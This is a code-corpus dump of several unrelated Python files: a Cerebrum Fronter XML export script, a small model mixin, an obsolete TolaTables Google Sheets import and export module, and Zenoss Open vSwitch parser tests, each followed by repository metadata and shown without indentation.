def output_person_names(data, printer):
printer.startElement("name")
printer.dataElement("fn", data["full"])
printer.startElement("n")
if data.get("first"):
printer.dataElement("given", data["first"])
if data.get("family"):
printer.dataElement("family", data["family"])
printer.endElement("n")
printer.endElement("name")
def output_email_info(data, printer):
for required_key in ("imap-server", "imap-user",):
if not data.get(required_key):
return
printer.startElement("extension")
# The magic keys/values below have been suggested by Fronter.
printer.emptyElement("emailsettings",
{"description": "HiO e-post",
"imap_serverdirectory": "mail/",
"imap_sentfolder": "INBOX.Sent",
"imap_draftfolder": "INBOX.Drafts",
"imap_trashfolder": "INBOX.Trash",
# According to Fronter, this value means use the same
# password as for logging into fronter.
"mail_password": "FRONTERLOGIN",
"mail_username": data["imap-user"],
"mailtype": "1",
"use_ssl": "1",
"defaultmailbox": "1",
"on_delete_action": "trash",
"is_primary": "1",
"mailserver": data["imap-server"]})
printer.endElement("extension")
def output_person_address(data, printer):
if not data.get("address"):
return
address = data["address"]
# No non-empty address field. That happens sometimes.
if not [x for x in address.itervalues() if bool(x)]:
return
printer.startElement("adr")
for key in address:
value = address[key]
if value:
printer.dataElement(key, value)
printer.endElement("adr")
def output_person_phone(data, printer):
if not data.get("mobile"):
return
# 3 means mobile phone in the IMS specification
printer.dataElement("tel", data["mobile"], {"teltype": "3"})
def output_person_element(data, printer):
"""Output all relevant data for a <person> element.
"""
printer.startElement("person", {"recstatus": STATUS_ADD})
output_id(data["user"], printer)
output_person_auth(data, printer)
printer.dataElement("email", data["email"])
output_person_names(data, printer)
output_email_info(data, printer)
output_person_address(data, printer)
output_person_phone(data, printer)
printer.endElement("person")
def output_people(db, tree, printer):
"""Output information about all people mentioned in at least one group in
tree.
The information has already been prepared by the corresponding nodes. The
only thing left to do here is to make sure that the same person is not
output twice.
"""
logger.debug("Outputting all people registered in the CF-tree (in-memory)")
member_info = CfMembers(db).member_info()
processed = set()
for group in tree.iterate_groups(CfMemberGroup):
processed.update(group.iterate_members())
# We want to output the users sorted by id to make comparison by humans
# easier.
for member_id in sorted(processed):
xml_data = member_info.get(member_id)
if xml_data is None:
logger.warn("No data about account_id=%s", member_id)
continue
output_person_element(xml_data, printer)
def output_group_element(cf_group, printer, member_group_owner):
"""Output all info pertaining to the specific cf_group"""
printer.startElement("group", {"recstatus": STATUS_ADD, })
output_id(cf_group.cf_id(), printer)
printer.startElement("grouptype")
printer.dataElement("scheme", "FronterStructure1.0")
printer.emptyElement("typevalue", {"level": cf_group.cf_typevalue()})
printer.endElement("grouptype")
printer.startElement("description")
if len(cf_group.cf_title()) > 60:
# printer.emptyElement("short")
printer.dataElement("long", cf_group.cf_title())
else:
printer.dataElement("short", cf_group.cf_title())
printer.endElement("description")
printer.startElement("relationship", {"relation": "1"})
if isinstance(cf_group, CfMemberGroup):
output_id(member_group_owner, printer)
else:
output_id(cf_group.cf_parent_id(), printer)
printer.emptyElement("label")
printer.endElement("relationship")
printer.endElement("group")
def output_member_groups(db, tree, printer):
"""Output all group information about the structures we are building in
CF.
db is passed along for completeness. It's unused here.
"""
member_owner = tree._person_group_holder.cf_id()
for cf_group in tree.iterate_groups_topologically():
output_group_element(cf_group, printer, member_owner)
def output_user_membership(group, members, printer):
"""Output XML subtree for the specific membership."""
printer.startElement("membership")
output_id(group.cf_id(), printer)
for member in members:
printer.startElement("member")
output_id(member, printer)
# 1 = person, 2 = group
printer.dataElement("idtype", "1")
printer.startElement("role", {"recstatus": STATUS_ADD,
# FIXME: This should be expressed via
# cf_permission, since a specific user
# within a group may have a different
# permission.
"roletype": CfPermission.ROLE_WRITE})
# 0 = inactive member, 1 = active member
printer.dataElement("status", "1")
# FIXME: What does this junk mean? All person members seem to have
# this memberof extension with type=2. This is a blind copy from
# UiO/UiA.
printer.startElement("extension")
printer.emptyElement("memberof", {"type": "2"})
printer.endElement("extension")
printer.endElement("role")
printer.endElement("member")
printer.endElement("membership")
def output_user_memberships(db, tree, printer):
"""Output all user membership information."""
account2uname = CfMembers(db).account2uname()
for group in tree.iterate_groups(CfMemberGroup):
members = [account2uname[x] for x in group.iterate_members()]
if not members:
continue
output_user_membership(group, members, printer)
def output_viewcontacts(target, permission_holders, printer):
"""Helper function to output viewContacts permissions"""
printer.startElement("membership")
output_id(target.cf_id(), printer)
for gm in permission_holders:
printer.startElement("member")
output_id(gm.cf_id(), printer)
# 1 = person, 2 = group
printer.dataElement("idtype", "2")
printer.startElement("role", {"recstatus": STATUS_ADD})
# 0 = inactive member, 1 = active member
printer.dataElement("status", "1")
printer.startElement("extension")
printer.emptyElement("groupaccess", {"roomAccess": "0",
"contactAccess": "100", })
printer.endElement("extension")
printer.endElement("role")
printer.endElement("member")
printer.endElement("membership")
def process_viewcontacts_permissions(cf_group, local_permissions,
inherited_permissions, printer):
"""Generate XML for representing viewContacts permissions related to
cf_group.
This is where it gets hairy.
"""
assert isinstance(cf_group, CfStructureGroup)
# This method is always called with cf_group == cf_structure_group.
#
# So, for each such cf_structure_group we need to locate the corresponding
# cf_member_groups. Some of them are direct children of cf_group. Others
# are permission holders in local_ or inherited_permissions. NB!
# isinstance(x.holder(), CfMemberGroup) for x in permissions MUST BE
# True.
#
local_member_groups = set(cf_group.iterate_children(CfMemberGroup))
local_nonstudents = set(x for x in local_member_groups
if not x.cf_is_student_group())
local_permission_holders = set(x.holder() for x in
local_permissions
if isinstance(x.holder(), CfMemberGroup))
inherited_permission_holders = set(
x.holder() for x in inherited_permissions if
isinstance(x.holder(), CfMemberGroup))
all_at_this_level = set().union(
local_member_groups).union(
local_permission_holders).union(
inherited_permission_holders)
all_nonstudent = set(x for x in all_at_this_level
if not x.cf_is_student_group())
logger.debug("ViewContacts at level %s: %d local (%d non-student); "
"%d local perm holders, %d inherited perm holders, "
"%d total at this level",
cf_group.cf_id(),
len(local_member_groups),
len(local_nonstudents),
len(local_permission_holders),
len(inherited_permission_holders),
len(all_at_this_level))
# If there are no /member/ groups at this level, then there are no
# viewContacts permissions to hand out. This means that our job is done.
if not local_member_groups:
return
student_member_group = [x for x in local_member_groups
if x.cf_is_student_group()]
assert len(student_member_group) <= 1
if student_member_group:
student_member_group = student_member_group[0]
else:
student_member_group = None
# Case 1: *Everybody* has viewContacts on the student group
if student_member_group:
output_viewcontacts(student_member_group, all_at_this_level, printer)
logger.debug(
"%s is a student group and %s groups have viewContacts on it",
student_member_group.cf_id(),
len(all_at_this_level))
# Case 2: Every nonstudent group at this level has viewContacts on every
# local nonstudent group
for g in local_nonstudents:
output_viewcontacts(g, all_nonstudent, printer)
logger.debug("%s is a local non-student group and %s groups have "
"viewContacts on it", g.cf_id(), len(all_nonstudent))
# Case 3: Finally, every local nonstudent group has viewContacts on
# inherited permission holders. (i.e. local "LÆRER" will have viewContacts
# on inherited "ADMIN")
for g in inherited_permission_holders:
output_viewcontacts(g, local_nonstudents, printer)
logger.debug("%s is an inherited permission group and %s local groups "
"have viewContacts on it",
g.cf_id(), len(local_nonstudents))
def output_node_permissions(cf_group, local_permissions,
inherited_permissions, printer):
"""Generate XML for representing permissions on cf_group.
permissions is a sequence of cf_permission instances that list permissions
(direct or indirect) on cf_group. I.e. there may be entries in permissions
that have target != cf_group.
"""
permissions = local_permissions + inherited_permissions
# No permissions -> nothing to do
if len(permissions) == 0:
logger.debug("No permissions output for group id=%s",
cf_group.cf_id())
return
logger.debug("cf_group id=%s has %d local and %d inherited permissions",
cf_group.cf_id(), len(local_permissions),
len(inherited_permissions))
printer.startElement("membership")
output_id(cf_group.cf_id(), printer)
for permission in permissions:
printer.startElement("member")
output_id(permission.holder().cf_id(), printer)
# 1 = person, 2 = group
printer.dataElement("idtype", "2")
printer.startElement("role", {"recstatus": STATUS_ADD,
"roletype": permission.access_type(), })
# FIXME: what about <extension><memberof type="??"></extension> ?
# 0 = inactive, 1 = active member
printer.dataElement("status", "1")
printer.endElement("role")
printer.endElement("member")
printer.endElement("membership")
def process_node_permissions(node, inherited_permissions, printer):
"""Output permissions for the CF subtree with root at node.
Permissions are generated in depth-first order down the tree.
@type node: cf_structure_group instance
@param node:
Subtree root for which we generate permission data. I.e. other
structures have permissions on L{node}.
@type inherited_permissions: sequence of cf_permission instances.
@param inherited_permissions:
Sequence of permissions inherited by this node from its parents. Some
groups result in recursive permissions. E.g. an 'admin' role given for a
'stprog' is *inherited* for all structures associated with that 'stprog'
(kull and kullklasse). Should node have its own recursive permissions,
they are added to inherited_permissions.
"""
#
# There is a bit of tuple copying here; hopefully this won't be a
# performance issue.
#
children = node.iterate_children(CfStructureGroup)
local_permissions = tuple(node.iterate_permissions())
output_node_permissions(node, local_permissions, inherited_permissions,
printer)
process_viewcontacts_permissions(node, local_permissions,
inherited_permissions, printer)
node_recursive_permissions = tuple(x for x in local_permissions
if x.is_recursive())
children_permissions = inherited_permissions + node_recursive_permissions
for child in children:
process_node_permissions(child, children_permissions, printer)
def output_permissions(tree, printer):
"""Output all permissions.
Permissions are expressed in IMS enterprise through memberships, much like
output_membership. However, in this case groups are members of other
groups (groups-with-user-members are members of STRUCTURE/ROOM groups).
"""
root = tree.get_root()
process_node_permissions(root, tuple(), printer)
def generate_xml_file(filename, db, tree):
"""'Flatten' cf_tree to L{filename}.
'Flattening' is accomplished in several steps:
* output people
* output all groups
* output all memberships
* output all permissions
"""
printer = open_xml_stream(filename)
printer.startDocument("utf-8")
printer.startElement("enterprise")
output_fixed_header(printer)
output_people(db, tree, printer)
output_member_groups(db, tree, printer)
output_user_memberships(db, tree, printer)
output_permissions(tree, printer)
printer.endElement("enterprise")
printer.endDocument()
printer.fp.close()
def build_multisemester_mapping(undenh_file, undakt_file):
"""Build a dict to remap multisemester (flersemester) entities.
This function helps to go from a group_name in Cerebrum for
undenh/undakt-related groups to the structure id of the node in the
Fronter tree. I.e. we want to assist remapping
hiof.no:fs:224:400000:emner:2008:vår:undakt:HSS40505:1:1:0
to
STRUCTURE:hiof.no:fs:224:400000:emner:2009:vår
... if the first one is the start semester for an undakt in its 3rd active
semester.
@rtype: dict of str to str
@return:
A mapping built for all multisemester entries in the files. Since both
undenh and undakt have the same structure parent, the mappings are built
like this:
'ROOM:hiof.no:fs:224:400000:emner:2008:vår:undakt:HSS40505:1:1:0' ->
'STRUCTURE:hiof.no:fs:224:400000:emner:2009:vår'
... where 2008/vår-components are 'counted back' (see
populate_fronter_groups._count_back_semester) from the data in
undenh/undakt file.
"""
prefix = "hiof.no:%s:" % (cereconf.DEFAULT_INSTITUSJONSNR,)
value_template = "STRUCTURE:" + prefix + "%02d0000:emner:%s:%s"
key_template = "ROOM:" + prefix + "%02d0000:emner:%s:%s:%s:%s:%s:%s"
result = dict()
for (source,
entry_kind) in ((EduDataGetter(undenh_file, logger).iter_undenh,
"undenh",),
(EduDataGetter(undakt_file, logger).iter_undakt,
"undakt",)):
logger.debug("Mapping multisemester %s", entry_kind)
for entry in source():
attrs = lower(entry)
if "terminnr" not in attrs:
continue
if not timeslot_is_valid(attrs):
logger.debug("Ignoring '%s' - data too old/in the future: "
"attrs=%s", entry_kind, attrs)
continue
# Technically, this is cheating -- faknr_kontroll does not have to
# match whatever faculty info is in the emne-info.xml
structure = value_template % (int(attrs["faknr_kontroll"]),
attrs["arstall"],
attrs["terminkode"])
original = (attrs["arstall"], attrs["terminnr"])
attrs = count_back_semesters(attrs)
# remapped = (attrs["arstall"], attrs["terminnr"])
key = key_template % (int(attrs["faknr_kontroll"]),
attrs["arstall"],
attrs["terminkode"],
entry_kind,
attrs["emnekode"],
attrs["versjonskode"],
attrs["terminnr"])
if entry_kind == "undakt":
key = key + ":" + attrs["aktivitetkode"]
# Key may already be in result! This happens when terminnr=1 and
# terminnr=2 for the same undenh are in the file. The resulting
# IDs are the same, since we count back semesters, but the
# structure to which key is to be associated is NOT. Whichever is
# earliest must be used.
if key in result:
previous_year, previous_sem = result[key].split(":")[-2:]
if ((int(previous_year) > int(original[0])) or
(int(previous_year) == int(original[0]) and
previous_sem == "høst")):
result[key] = structure
else:
result[key] = structure
logger.debug("Connecting %s to %s", key, result[key])
return result
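# Worked illustration of the earliest-wins rule above (values hypothetical):
# an undenh taught over two semesters appears both as terminnr=1 (2009/vår)
# and terminnr=2 (2009/høst). Both rows count back to the same ROOM key, but
# the STRUCTURE values differ (...:2009:vår vs ...:2009:høst); the earlier
# one, ...:2009:vår, is the one that ends up in the mapping.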
def main(inargs=None):
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-x', '--xml-file', dest='xml_file',
help='XML-file to be generated',
required=True)
parser.add_argument('-e', '--undenh-file', dest='undenh_file',
help='Department XML-export from FS',
required=True)
parser.add_argument('-a', '--undakt-file', dest='undakt_file',
help='Activity XML-export from FS',
required=True)
parser.add_argument('-u', '--uname-suffix', dest='uname_suffix',
help='Username suffix to be added (default: empty)',
default='')
Cerebrum.logutils.options.install_subparser(parser)
args = parser.parse_args(inargs)
Cerebrum.logutils.autoconf('cronjob', args)
global uname_suffix
uname_suffix = args.uname_suffix
db = Factory.get("Database")()
groups = collect_cf_groups(db)
multisemester_map = build_multisemester_mapping(args.undenh_file,
args.undakt_file)
tree = build_cf_tree(db, groups, multisemester_map)
generate_xml_file(args.xml_file, db, tree)
if __name__ == "__main__":
main()
|
unioslo/cerebrum
|
contrib/no/hiof/generate_fronter_xml.py
|
Python
|
gpl-2.0
| 62,391
|
class Model(object):
"model mixin, based on sklearn."
def __init__(self, sample_factory, hyperparameters):
self.sample_factory = sample_factory
self.hyperparams = hyperparameters
def fit(self, X, Y):
pass
|
cjacoby/ml-experiment
|
experiment/model.py
|
Python
|
gpl-2.0
| 245
|
import os, logging, httplib2, json, datetime
from django.core.urlresolvers import reverse, reverse_lazy
from django.shortcuts import render
from django.http import HttpResponseRedirect, HttpResponseBadRequest, JsonResponse
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.utils import timezone
from oauth2client.client import flow_from_clientsecrets
from oauth2client.contrib.django_orm import Storage
from oauth2client.contrib import xsrfutil
from django.conf import settings
from django.views.decorators.csrf import csrf_protect
from .models import GoogleCredentialsModel
from apiclient.discovery import build
#import gdata.spreadsheets.client
from .models import Silo, Read, ReadType, ThirdPartyTokens, LabelValueStore, Tag
########################################################################################
###################### OBSOLETE - NOT IN USE ###########################################
# THE CODE IN THIS FILE IS KEPT ONLY FOR REFERENCE PURPOSES. ALL OF THE FUNCTIONALITY
# HAS BEEN MIGRATED TO VER. 4 OF THE GOOGLE SHEETS API. THE CODE IN THIS FILE
# USES VER. 3 OF THE GOOGLE GSHEET API.
########################################################################################
CLIENT_SECRETS = os.path.join(os.path.dirname(__file__), 'client_secrets.json')
FLOW = flow_from_clientsecrets(
CLIENT_SECRETS,
scope='https://www.googleapis.com/auth/drive https://spreadsheets.google.com/feeds https://www.googleapis.com/auth/spreadsheets',
redirect_uri=settings.GOOGLE_REDIRECT_URL)
#redirect_uri='http://localhost:8000/oauth2callback/')
def picker_view(request):
return render(request, 'picker.html')
def get_authorized_sp_client(credential_json):
# Create OAuth2Token for authorizing the SpreadsheetClient
token = gdata.gauth.OAuth2Token(
client_id = credential_json['client_id'],
client_secret = credential_json['client_secret'],
scope = 'https://spreadsheets.google.com/feeds',
user_agent = "TOLA",
access_token = credential_json['access_token'],
refresh_token = credential_json['refresh_token'])
# Instantiate the SpreadsheetClient object
sp_client = gdata.spreadsheets.client.SpreadsheetsClient(source="TOLA")
# authorize the SpreadsheetClient object
sp_client = token.authorize(sp_client)
return sp_client
def export_to_google_spreadsheet(credential_json, silo_id, spreadsheet_key):
sp_client = get_authorized_sp_client(credential_json)
# Create a WorksheetQuery object to allow for filtering for worksheets by the title
worksheet_query = gdata.spreadsheets.client.WorksheetQuery(title="Sheet1", title_exact=True)
# Get a feed of all worksheets in the specified spreadsheet that matches the worksheet_query
worksheets_feed = sp_client.get_worksheets(spreadsheet_key, query=worksheet_query)
#print("worksheets_feed: %s" % worksheets_feed)
# Retrieve the worksheet_key from the first match in the worksheets_feed object
worksheet_key = worksheets_feed.entry[0].id.text.rsplit("/", 1)[1]
#print("worksheet_key: %s" % worksheet_key)
silo_data = LabelValueStore.objects(silo_id=silo_id)
# Create a CellBatchUpdate object so that all cells update is sent as one http request
batch = gdata.spreadsheets.data.BuildBatchCellsUpdate(spreadsheet_key, worksheet_key)
col_index = 0
row_index = 1
col_info = {}
for row in silo_data:
row_index = row_index + 1
for i, col_name in enumerate(row):
if col_name not in col_info.keys():
col_index = col_index + 1
col_info[col_name] = col_index
batch.add_set_cell(1, col_index, col_name) #Add column names
#print("%s = %s - %s: %s" % (col_info[col_name], col_name, type(row[col_name]), row[col_name]))
val = row[col_name]
if col_name != "isd":
try:
#val = str(val)#.encode('ascii', 'ignore')
val = val.encode('ascii', 'xmlcharrefreplace')
except Exception as e:
try:
val = str(val)
except Exception as e1:
print(e)
print(val)
pass
batch.add_set_cell(row_index, col_info[col_name], val)
# By default a blank Google Spreadsheet has 26 columns, but if our data has
# more columns then we add more columns to the Google Spreadsheet;
# otherwise there would be a 500 error!
worksheet = worksheets_feed.entry[0]
worksheet.col_count.text = str(col_index)
# Send the worksheet update call to Google Server
sp_client.update(worksheet, force=True)
try:
# Finally send the CellBatchUpdate object to Google
sp_client.batch(batch, force=True)
except Exception as e:
print("ERROR: %s" % e)
return False
return True
@login_required
def export_gsheet(request, id):
gsheet_endpoint = None
read_url = request.GET.get('link', None)
file_id = request.GET.get('resource_id', None)
if read_url == None or file_id == None:
messages.error(request, "No Google Spreadsheet was selected to export data to.")
return HttpResponseRedirect(reverse('listSilos'))
storage = Storage(GoogleCredentialsModel, 'id', request.user, 'credential')
credential = storage.get()
if credential is None or credential.invalid == True:
FLOW.params['state'] = xsrfutil.generate_token(settings.SECRET_KEY, request.user)
authorize_url = FLOW.step1_get_authorize_url()
#FLOW.params.update({'redirect_uri_after_step2': "/export_gsheet/%s/?link=%s&resource_id=%s" % (id, read_url, file_id)})
request.session['redirect_uri_after_step2'] = "/export_gsheet/%s/?link=%s&resource_id=%s" % (id, read_url, file_id)
return HttpResponseRedirect(authorize_url)
credential_json = json.loads(credential.to_json())
user = User.objects.get(username__exact=request.user)
gsheet_endpoint = None
read_type = ReadType.objects.get(read_type="Google Spreadsheet")
try:
gsheet_endpoint = Read.objects.get(silos__id=id, type=read_type, silos__owner=user.id, read_name='Google')
except Read.MultipleObjectsReturned:
gsheet_endpoints = Read.objects.filter(silos__id=id, type=read_type, silos__owner=user.id, read_name='Google')
for endpoint in gsheet_endpoints:
if endpoint.resource_id:
gsheet_endpoint = endpoint
except Read.DoesNotExist:
gsheet_endpoint = Read(read_name="Google", type=read_type, owner=user)
gsheet_endpoint.save()
silo = Silo.objects.get(id=id)
silo.reads.add(gsheet_endpoint)
silo.save()
except Exception as e:
messages.error(request, "An error occurred: %s" % e.message)
if gsheet_endpoint.resource_id == "None" or gsheet_endpoint.resource_id == None:
gsheet_endpoint.resource_id = file_id
gsheet_endpoint.read_url = read_url
gsheet_endpoint.save()
#print("about to export to gsheet: %s" % gsheet_endpoint.resource_id)
if export_to_google_spreadsheet(credential_json, id, gsheet_endpoint.resource_id) == True:
link = "Your exported data is available at <a href=" + gsheet_endpoint.read_url + " target='_blank'>Google Spreadsheet</a>"
messages.success(request, link)
else:
messages.error(request, 'Something went wrong.')
return HttpResponseRedirect(reverse('listSilos'))
@login_required
def export_new_gsheet(request, id):
storage = Storage(GoogleCredentialsModel, 'id', request.user, 'credential')
credential = storage.get()
if credential is None or credential.invalid == True:
FLOW.params['state'] = xsrfutil.generate_token(settings.SECRET_KEY, request.user)
authorize_url = FLOW.step1_get_authorize_url()
#FLOW.params.update({'redirect_uri_after_step2': "/export_new_gsheet/%s/" % id})
request.session['redirect_uri_after_step2'] = "/export_new_gsheet/%s/" % id
return HttpResponseRedirect(authorize_url)
credential_json = json.loads(credential.to_json())
silo_id = id
silo_name = Silo.objects.get(pk=silo_id).name
http = httplib2.Http()
# Authorize the http object to be used with "Drive API" service object
http = credential.authorize(http)
# Build the Google Drive API service object
service = build("drive", "v2", http=http)
# The body of "insert" API call for creating a blank Google Spreadsheet
body = {
'title': silo_name,
'description': "Exported Data from Mercy Corps TolaData",
'mimeType': "application/vnd.google-apps.spreadsheet"
}
# Create a new blank Google Spreadsheet file in user's Google Drive
google_spreadsheet = service.files().insert(body=body).execute()
# Get the spreadsheet_key of the newly created Spreadsheet
spreadsheet_key = google_spreadsheet['id']
#print(spreadsheet_key)
if export_to_google_spreadsheet(credential_json, silo_id, spreadsheet_key) == True:
link = "Your exported data is available at <a href=" + google_spreadsheet['alternateLink'] + " target='_blank'>Google Spreadsheet</a>"
messages.success(request, link)
else:
messages.error(request, 'Something went wrong; try again.')
return HttpResponseRedirect(reverse('listSilos'))
def import_from_google_spreadsheet(credential_json, silo, spreadsheet_key):
sp_client = get_authorized_sp_client(credential_json)
# Create a WorksheetQuery object to allow for filtering for worksheets by the title
worksheet_query = gdata.spreadsheets.client.WorksheetQuery(title="Sheet1", title_exact=True)
# Get a feed of all worksheets in the specified spreadsheet (note: the
# worksheet_query above is currently not applied here)
worksheets_feed = sp_client.get_worksheets(spreadsheet_key)
# Retrieve the worksheet_key from the first match in the worksheets_feed object
worksheet_key = worksheets_feed.entry[0].id.text.rsplit("/", 1)[1]
ws = worksheets_feed.entry[0]
#print '%s - rows %s - cols %s\n' % (ws.title.text, ws.row_count.text, ws.col_count.text)
lvs = LabelValueStore()
list_feed = sp_client.get_list_feed(spreadsheet_key, worksheet_key)
for row in list_feed.entry:
row_data = row.to_dict()
skip_row = False
for key, val in row_data.iteritems():
# if the value of the unique column is already in the existing silo data, skip the row
for unique_field in silo.unique_fields.all():
filter_criteria = {'silo_id': silo.id, unique_field.name: val}
if LabelValueStore.objects.filter(**filter_criteria).count() > 0:
skip_row = True
continue
if skip_row == True:
break
if key == "" or key is None or key == "silo_id": continue
elif key == "id" or key == "_id": key = "user_assigned_id"
elif key == "create_date": key = "created_date"
elif key == "edit_date": key = "editted_date"
setattr(lvs, key, val)
if skip_row == True:
continue
lvs.silo_id = silo.id
lvs.create_date = timezone.now()
lvs.save()
lvs = LabelValueStore()
return True
@login_required
def import_gsheet(request, id):
gsheet_endpoint = None
silo = None
read_url = request.GET.get('link', None)
file_id = request.GET.get('resource_id', None)
file_name = request.GET.get("name", "Google Sheet Import")
if read_url == None or file_id == None:
messages.error(request, "No Google Spreadsheet was selected to import data from.")
return HttpResponseRedirect(reverse('index'))
storage = Storage(GoogleCredentialsModel, 'id', request.user, 'credential')
credential = storage.get()
if credential is None or credential.invalid == True:
FLOW.params['state'] = xsrfutil.generate_token(settings.SECRET_KEY, request.user)
authorize_url = FLOW.step1_get_authorize_url()
#FLOW.params.update({'redirect_uri_after_step2': "/export_gsheet/%s/?link=%s&resource_id=%s" % (id, read_url, file_id)})
request.session['redirect_uri_after_step2'] = "/import_gsheet/%s/?link=%s&resource_id=%s" % (id, read_url, file_id)
return HttpResponseRedirect(authorize_url)
credential_json = json.loads(credential.to_json())
user = User.objects.get(username__exact=request.user)
gsheet_endpoint = None
read_type = ReadType.objects.get(read_type="GSheet Import")
try:
silo = Silo.objects.get(id=id)
if silo.unique_fields.exists() == False:
messages.error(request, "A unique column must be specified when importing to an existing table. <a href='%s'>Specify Unique Column</a>" % reverse_lazy('siloDetail', kwargs={"id": silo.id}))
return HttpResponseRedirect(request.META['HTTP_REFERER'])
except Silo.DoesNotExist:
silo = Silo(name=file_name, owner=request.user, public=False, description="Google Sheet Import")
silo.save()
try:
gsheet_endpoint = Read.objects.get(silos__id=id, type=read_type, silos__owner=user.id, resource_id=file_id, read_name='GSheet Import')
except Read.MultipleObjectsReturned:
messages.error(request, "There should not be multiple records for the same gsheet, silo, and owner")
except Read.DoesNotExist:
gsheet_endpoint = Read(read_name="GSheet Import", type=read_type, resource_id=file_id, owner=user)
gsheet_endpoint.read_url = read_url
gsheet_endpoint.save()
silo.reads.add(gsheet_endpoint)
silo.save()
except Exception as e:
messages.error(request, "An error occurred: %s" % e.message)
#print("about to export to gsheet: %s" % gsheet_endpoint.resource_id)
if import_from_google_spreadsheet(credential_json, silo, gsheet_endpoint.resource_id) == True:
link = "Your imported data is available here. <a href='%s'>See the table</a>" % reverse_lazy('siloDetail', kwargs={"id": silo.id})
messages.success(request, link)
else:
messages.error(request, 'Something went wrong.')
#messages.success(request, "Now, it should import data from GSheet")
return HttpResponseRedirect(reverse('index'))
@login_required
def oauth2callback(request):
if not xsrfutil.validate_token(settings.SECRET_KEY, str(request.GET['state']), request.user):
return HttpResponseBadRequest()
credential = FLOW.step2_exchange(request.GET)
storage = Storage(GoogleCredentialsModel, 'id', request.user, 'credential')
storage.put(credential)
#print(credential.to_json())
redirect_url = request.session['redirect_uri_after_step2']
return HttpResponseRedirect(redirect_url)
|
mercycorps/TolaTables
|
silo/google_views.py
|
Python
|
gpl-2.0
| 14,947
|
###########################################################################
#
# This program is part of Zenoss Core, an open source monitoring platform.
# Copyright (C) 2015, Zenoss Inc.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 or (at your
# option) any later version as published by the Free Software Foundation.
#
# For complete information please visit: http://www.zenoss.com/oss/
#
###########################################################################
from Products.ZenRRD.CommandParser import ParsedResults
from Products.ZenRRD.zencommand import Cmd, DataPointConfig
from Products.ZenTestCase.BaseTestCase import BaseTestCase
from ..parsers.BridgeStatistics import BridgeStatistics as BridgeStatisticsParser
from ..parsers.InterfaceStatistics import InterfaceStatistics as InterfaceStatisticsParser
from ..parsers.OVSStatus import OVSStatus as OVSStatusParser
from ..parsers.BridgePortStatus import BridgePortStatus as BPStatusParser
from ..parsers.InterfaceStatus import InterfaceStatus as IFStatusParser
from .util import loadData
class FakeCmdResult(object):
exitCode = None
output = None
stderr = None
def __init__(self, exitCode, output):
self.exitCode = exitCode
self.output = output
class TestParser(BaseTestCase):
def _getCmd(self, component, command, exitCode, filename, points):
cmd = Cmd()
# DeviceConfig no longer exists as of Zenoss 4.
try:
from Products.ZenRRD.zencommand import DeviceConfig
cmd.deviceConfig = DeviceConfig()
except ImportError:
from Products.ZenCollector.services.config import DeviceProxy
cmd.deviceConfig = DeviceProxy()
cmd.deviceConfig.device = 'testDevice'
cmd.component = component
cmd.command = command
cmd.eventClass = '/Cmd/Fail'
cmd.eventKey = 'interfaceIncomingBytes'
cmd.result = FakeCmdResult(exitCode, loadData(filename))
cmd.points = points
# Since we only consider the OVS records within cycleTime for event
# processing, the records used by the unit tests must always be
# processed. This is achieved by setting a huge value for cycleTime.
cmd.cycleTime = 1430000000
return cmd
def _getDumpAggregateCmd(self, exitCode, filename):
points = []
for dp_id in ('packet_count', 'byte_count', 'flow_count',):
dpc = DataPointConfig()
dpc.id = dp_id
dpc.component = 'bridges'
points.append(dpc)
cmd = self._getCmd(
'bridge-3fe10504-e059-4398-8b12-b7627e7b5b95',
'/usr/bin/ovs-ofctl dump-aggregate br-int',
exitCode, filename, points)
return cmd
def testDumpAggregate(self):
parser = BridgeStatisticsParser()
results = ParsedResults()
parser.processResults(
self._getDumpAggregateCmd(0, 'cmd_dump_aggregate.txt'),
results)
self.assertEquals(len(results.values), 3)
self.assertEquals(len(results.events), 0)
def testDumpAggregate_none(self):
parser = BridgeStatisticsParser()
results = ParsedResults()
parser.processResults(
self._getDumpAggregateCmd(0, 'cmd_dump_aggregate_none.txt'),
results)
self.assertEquals(len(results.values), 0)
self.assertEquals(len(results.events), 0)
def _getListInterfacesCmd(self, exitCode, filename):
points = []
for dp_id in ('rx_bytes', 'tx_bytes', 'rx_packets', 'tx_packets',
'collisions', 'rx_dropped', 'tx_dropped',
'rx_crc_err', 'rx_frame_err', 'rx_errors', 'tx_errors',
):
dpc = DataPointConfig()
dpc.id = dp_id
dpc.component = 'interfaces'
points.append(dpc)
cmd = self._getCmd(
'interface-6898492f-2d2e-439e-9370-a0073a0669f8',
'/usr/bin/ovs-vsctl --columns=_uuid,statistics,external_ids,mac_in_use,name list interface',
exitCode, filename, points)
return cmd
def testListInterfaces(self):
parser = InterfaceStatisticsParser()
results = ParsedResults()
parser.processResults(
self._getListInterfacesCmd(0, 'cmd_list_interfaces.txt'),
results)
self.assertEquals(len(results.values), 9)
self.assertEquals(len(results.events), 0)
def testListInterfaces_none(self):
parser = InterfaceStatisticsParser()
results = ParsedResults()
parser.processResults(
self._getListInterfacesCmd(0, 'cmd_list_interfaces_none.txt'),
results)
self.assertEquals(len(results.values), 0)
self.assertEquals(len(results.events), 0)
def _getCentOSOVSRunningCmd(self, exitCode, filename):
points = []
cmd = self._getCmd(
'',
'/bin/echo "BEGIN" ; /sbin/service openvswitch status 2> /dev/null ; echo "SPLIT" ; /usr/bin/systemctl status openvswitch-nonetwork.service 2> /dev/null ; echo "SPLIT" ; /usr/bin/sudo service openvswitch-switch status 2> /dev/null ; echo "END"',
exitCode, filename, points)
return cmd
def testCentOS6NotRunning(self):
parser = OVSStatusParser()
results = ParsedResults()
parser.processResults(
self._getCentOSOVSRunningCmd(0, 'centos_6_ovs_not_running.txt'),
results)
self.assertEquals(len(results.values), 0)
self.assertEquals(len(results.events), 1)
def testCentOS6Running(self):
parser = OVSStatusParser()
results = ParsedResults()
parser.processResults(
self._getCentOSOVSRunningCmd(0, 'centos_6_ovs_running.txt'),
results)
self.assertEquals(len(results.values), 0)
self.assertEquals(len(results.events), 1)
def testCentOS7NotRunning(self):
parser = OVSStatusParser()
results = ParsedResults()
parser.processResults(
self._getCentOSOVSRunningCmd(0, 'centos_7_ovs_not_running.txt'),
results)
self.assertEquals(len(results.values), 0)
self.assertEquals(len(results.events), 1)
def testCentOS7Running(self):
parser = OVSStatusParser()
results = ParsedResults()
parser.processResults(
self._getCentOSOVSRunningCmd(0, 'centos_7_ovs_running.txt'),
results)
